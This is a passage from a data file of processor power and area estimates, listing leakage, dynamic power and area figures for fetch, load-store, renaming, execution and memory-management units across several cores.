'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00153603,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0136476,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0384308,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.102793,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.348134,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.34913,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.852135,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0110794,
'L2/Runtime Dynamic': 0.00353944,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.72764,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.2019,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0805741,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0805741,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.10967,
'Load Store Unit/Runtime Dynamic': 1.67983,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.198682,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.397364,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0705129,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0706297,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0572173,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.680396,
'Memory Management Unit/Runtime Dynamic': 0.127847,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.9845,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0203946,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.207867,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.228261,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.76856,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174315,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281163,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.141922,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597399,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199365,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21299,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00731154,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0540733,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0528716,
'Execution Unit/Register Files/Runtime Dynamic': 0.0613848,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111386,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.291762,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55861,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233622,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0021177,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865114,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000776767,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756691,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194391,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.051982,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.30651,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175856,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176554,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68549,
'Instruction Fetch Unit/Runtime Dynamic': 0.431399,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00567966,
'L2/Runtime Dynamic': 0.00181095,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49482,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.606984,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0406895,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0406894,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68696,
'Load Store Unit/Runtime Dynamic': 0.848339,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100333,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200666,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356086,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0356682,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205586,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0289046,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.422865,
'Memory Management Unit/Runtime Dynamic': 0.0645729,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6035,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00786459,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0889693,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0968338,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.00157,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174456,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281392,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.142037,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597885,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199528,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21331,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00731748,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0529148,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0541173,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0529148,
'Execution Unit/Register Files/Runtime Dynamic': 0.0614348,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111477,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.292084,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55947,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233642,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233642,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00211788,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865185,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
